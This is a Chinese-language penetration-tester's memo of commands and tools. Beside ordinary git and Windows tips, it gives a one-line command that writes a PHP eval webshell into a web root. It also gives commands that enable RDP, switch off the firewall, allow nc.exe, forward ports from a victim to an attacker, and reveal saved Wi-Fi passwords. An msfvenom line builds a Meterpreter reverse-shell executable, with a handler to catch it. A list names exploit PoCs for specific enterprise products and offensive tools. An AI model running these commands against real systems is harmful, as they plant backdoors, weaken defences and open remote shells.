前言

备忘录分为:技巧、命令、工具,三大类别。

旨在记录常用、好用的知识,便于快速翻阅查找,节省时间。

技巧篇

1.webshell 上传

(1)Windows 命令行写入 shell

1
echo ^<?php @eval($_POST[1]);?^>> ./WWW/shell.php

操作系统篇

1. Windows

(1)查看并杀死某个进程

1
2
3
4
5
tasklist
tskill pid

taskkill /f /im notepad.exe /t
taskkill /f /pid 1234 /t

(2) 查看本机网络连接情况

1
2
3
4
5
netstat -ano|findstr 本机ip

-a 查看开启了哪些端口
-n 查看端口的网络连接情况
-o 查看端口的进程,方便杀死

(3) RDP

1
2
3
4
5
6
7
8
9
10
11
12
#开启 RDP
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /d 0 /t REG_DWORD /f

wmic /namespace:\\root\CIMV2\TerminalServices PATH Win32_TerminalServiceSetting WHERE (__CLASS !="") CALL SetAllowTSConnections 1

#查看 RDP 服务端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /*出来的结果是 16 进制

#将十六进制转换为 10 进制
set /a a=0xd3d

(4) 防火墙

netsh

查看防火墙状态

1
2
netsh firewall show state
netsh advfirewall show allprofiles

开启防火墙

1
2
netsh firewall set opmode enable
netsh firewall set allprofiles state on

关闭防火墙

1
2
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

设置防火墙日志路径

1
netsh advfirewall set currentprofile logging filename "C:\Windows\firewall.log"

添加防火墙规则

1
netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=tcp localport=3389           允许 3389 端口

删除防火墙规则

1
netsh advfirewall firewall delete rule name="rule_name"

添加端口规则

1
netsh firewall portopening tcp 1234 rule_name

删除端口规则

1
netsh firewall delete portopening tcp 1234

添加程序规则

1
netsh firewall add allowedprogram "C:\\nc.exe" "allow nc" enable

删除程序规则

1
netsh firewall delete allowedprogram "C:\\nc.exe"

添加端口转发

1
netsh interface portproxy add v4tov4 [listenaddress=victim_ip] listenport=victim_port connectaddress=attack_ip connectport=attack_port

删除端口转发

1
netsh interface portproxy delete v4tov4 [listenaddress=victim_ip] listenport=victim_port

查看端口转发

1
2
3
4
5
netsh interface portproxy show all
netsh interface portproxy show v4tov4
netsh interface portproxy show v4tov6
netsh interface portproxy show v6tov4
netsh interface portproxy show v6tov6

安装 IPv6

1
netsh interface ipv6 install

查看无线网络信息

1
netsh wlan show profiles

查看指定 WIFI 密码

1
netsh wlan show profiles wifi_name key=clear

(5) 改变字符编码,修复乱码

1
2
3
4
5
6
7
8
9
10
chcp 65001

chcp 查看命令行环境字符编码(为一个全局设置)
936 -- GBK(一般情况下为默认编码)
437 -- 美国英语
65001 -- utf-8
1200 -- utf-16
1201 -- utf-16(Big-Endian)
12000 -- utf-32
12001 -- utf-32(Big-Endian)

(6) , 代替空格

1
2
dir,c:\
相当于:dir c:\

(7)查找具有某内容的 asp 文件

1
findstr /n /s /i "某某网站" C:\*.asp

(8) 查找C盘上的某个文件

1
dir /a/b/s C:\test.png

2. Linux

查找某个文件:flag.txt

1
find / | grep flag.txt 2>/dev/null

查找具有某内容的php文件

1
find /var/www/html/ -name "*.php" | xargs grep "某某网站"

3. Kali

(1) 远程登录

1
rdesktop ip

工具篇

1. msfvenom

(1)生成 http 反弹 shell

1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -f exe -o re.exe

2. msfconsole

(1) 监听 http reverse shell

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost ip
set lport port
run

3. github

3.1 常规操作

1
2
3
4
git add .
git commit -m "my commit"
git remote add origin git@github.com:ccc-f/fsafe.git
git push -u origin main

3.2 git fetch 和 git merge 合并远程和本地的更新(更加安全)

1
2
3
4
5
6
git remote add origin git@github.com:xxx/xxx.git
git fetch origin main:tmp
git merge tmp
git add .
git commit -m '提交'
git push -u origin main

3.3 git pull 可以先切换到本地的另一个分支,拉取更新,然后再合并到本地分支,再提交

1
2
3
4
5
6
git remote add origin git@github.com:xxx/xxx.git
git checkout dev
git pull
git checkout main
git merge dev
git push -u origin main

网站篇

个人武器库

1. 补充 Goby Poc

拓尔思_mas_rce

用友 ERP-NC NCFindWeb 目录遍历漏洞

H3C_IMC_RCE

SpringBoot Actuator 配置不当

TVT数码科技 NVMS-1000 路径遍历漏洞 CVE-2019-20085

昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞

极通EWEBS casmain.xgi 任意文件读取漏洞

中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞

eGroupWare spellchecker.php 远程命令执行漏洞

齐治堡垒机 gui_detail_view.php 任意用户登录漏洞

华天动力OA 8000版 workFlowService SQL注入漏洞

万户OA

通达

致远

2. 个人常用工具

推荐一个工具,可以自己去 DIY 集成下方工具,免去繁琐的查找打开工具过程

GUI_Tools

我自己也 DIY 了一个工具,目前在用这个:

PenKitGui

(1) 渗透测试

BurpSuite

Awvs https://www.fahai.org/index.php/archives/24/comment-page-1#comments

Goby

shiro反序列化利用

shiro批量检测

fofaviewer

(2) 内网渗透

Cobaltstrike

fscan

(3) 数据库利用

sqlmap

MDAT

(4) Web 扫描

dirsearch

御剑目录扫描

OneForAll

Packer-Fuzzer

JsFinder

(6) Webshell 管理

Godzila

冰蝎

(7) 搜索引擎

Fofa

Zoomeye

3. burp+chrome拓展

重点是几个被动扫描插件,避免了繁琐的手工测试。

burpsuite

  1. BurpFastJsonScan — BurpFastJsonScan,一款基于BurpSuite的被动式FastJson检测插件源处

  2. HaE — 一款使用Java开发的信息高亮标记与提取插件,比之前介绍过的两款(BurpSuite-Xkeys和IntelligentAnalysis-SSTVINFO)体验要好一点(需要手动写检测规则,内置只有一个邮箱的检测规则)。源处

  3. BurpShiroPassiveScan —一款基于BurpSuite的被动式shiro检测插件,目前有两大功能1.shiro框架指纹检测 2.shiro加密key检测 源处

  4. domain_hunter_pro —domain_hunter的高级版本,SRC挖洞、HW打点之必备 源处

  5. BurpSuite_403Bypasser —用python编写的用来测试绕过403的插件。源处

  6. sqlmap4burp++.0.2.jar —多平台无需外部依赖的burp联动sqlmap插件,使用也很简单,导入在burp拦截的请求里或者重放都可以直接发送到sqlmap4burp界面,第一次需要选择sqlmap.py文件位置进行设置,详细的可以看飘雪表哥-c0ny1源处

  7. captcha-killer-modified — captcha-killer的修改版,主要用于验证码爆破,适配新版Burpsuite,支持 dddocr 调用 源处

  8. passive-scan-client-0.1-jar-with-dependencies.jar — Burp被动扫描流量转发插件,比如搭配长亭的XRAY来进行被动扫描,借用群里表哥的话:挂着坐收洞详细说明

  9. chunked-coding-converter.0.2.1.jar 国人c0ny1最新版 burp分块输出,也是对抗waf的插件

  10. struts_ext_v2.jar —支持burpsuite插件形式调用检查struts2系列漏洞 下载-源处

chrome插件

  1. 检测web蜜罐 - anti-honeypot
  2. 油猴 - Tampermonkey
  3. Adblock Plus - 免费的广告拦截器
  4. Momentum - 标签页
  5. Octotree - GitHub code tree
  6. OneTab - 节省高达95%的内存,并减轻标签页混乱现象
  7. Proxy SwitchyOmega - 轻松快捷地管理和切换多个代理设置。

firefox插件:

Script Blocker Ultimate

阻止脚本执行